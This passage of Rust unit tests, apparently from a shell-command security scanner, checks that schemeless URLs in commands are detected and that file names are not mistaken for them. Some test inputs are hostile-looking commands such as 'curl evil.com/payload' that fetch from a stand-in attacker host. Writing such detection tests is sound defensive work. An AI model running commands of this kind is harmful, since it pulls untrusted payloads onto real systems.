let schemeless: Vec<_> = urls
.iter()
.filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
.collect();
assert!(
schemeless.is_empty(),
"output.html should not be detected as schemeless URL"
);
}
#[test]
fn test_schemeless_skip_wget_combined() {
let urls = extract_urls("wget -Ooutput.html https://example.com", ShellType::Posix);
let schemeless: Vec<_> = urls
.iter()
.filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
.collect();
assert!(
schemeless.is_empty(),
"-Ooutput.html should not be detected as schemeless URL"
);
}
#[test]
fn test_schemeless_real_domain_still_detected() {
let urls = extract_urls("curl evil.com/payload", ShellType::Posix);
let schemeless: Vec<_> = urls
.iter()
.filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
.collect();
assert!(
!schemeless.is_empty(),
"evil.com/payload should be detected as schemeless URL"
);
}
#[test]
fn test_schemeless_user_at_host_detected_in_sink_context() {
let urls = extract_urls("curl user@bit.ly", ShellType::Posix);
let schemeless: Vec<_> = urls
.iter()
.filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
.collect();
assert_eq!(schemeless.len(), 1);
assert_eq!(schemeless[0].raw, "user@bit.ly");
}
#[test]
fn test_scp_user_at_host_not_treated_as_schemeless_url() {
let urls = extract_urls("scp user@server.com file.txt", ShellType::Posix);
let schemeless: Vec<_> = urls
.iter()
.filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
.collect();
assert!(schemeless.is_empty());
}
#[test]
fn test_schemeless_png_no_slash_is_file() {
assert!(!looks_like_schemeless_host("lenna.png"));
}
#[test]
fn test_schemeless_tld_overlap_with_path_is_domain() {
assert!(looks_like_schemeless_host("evil.zip/payload"));
assert!(looks_like_schemeless_host("evil.sh/payload"));
}
#[test]
fn test_schemeless_tld_overlap_without_path_is_file() {
assert!(!looks_like_schemeless_host("lenna.zip"));
assert!(!looks_like_schemeless_host("script.sh"));
}
#[test]
fn test_schemeless_tld_overlap_sink_context_detected() {
let urls = extract_urls("curl evil.zip/payload", ShellType::Posix);
let schemeless: Vec<_> = urls
.iter()
.filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
.collect();
assert!(
!schemeless.is_empty(),
"evil.zip/payload should be detected as schemeless URL in sink context"
);
}
}